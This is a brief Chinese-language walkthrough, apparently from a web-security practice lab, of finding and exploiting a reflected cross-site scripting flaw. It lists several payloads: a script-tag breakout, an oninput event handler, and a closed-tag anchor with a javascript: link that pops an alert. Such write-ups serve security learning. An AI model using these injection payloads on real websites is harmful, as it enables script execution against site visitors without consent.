第一步:判断是否存在漏洞
输入的内有有回显,故存在漏洞
第二步:尝试利用漏洞
Payload:
1987"><script>alert("yes")</script>
现象:
使用html事件进行尝试:
1987"oninput=“alert('yes')
构造一个Payload闭合闭合原标签,重新创建一个a标签
a标签中引入一个script超链接来调用弹窗。
"> <a href="javascript:alert('test')">link</a>
点击链接,弹窗成功。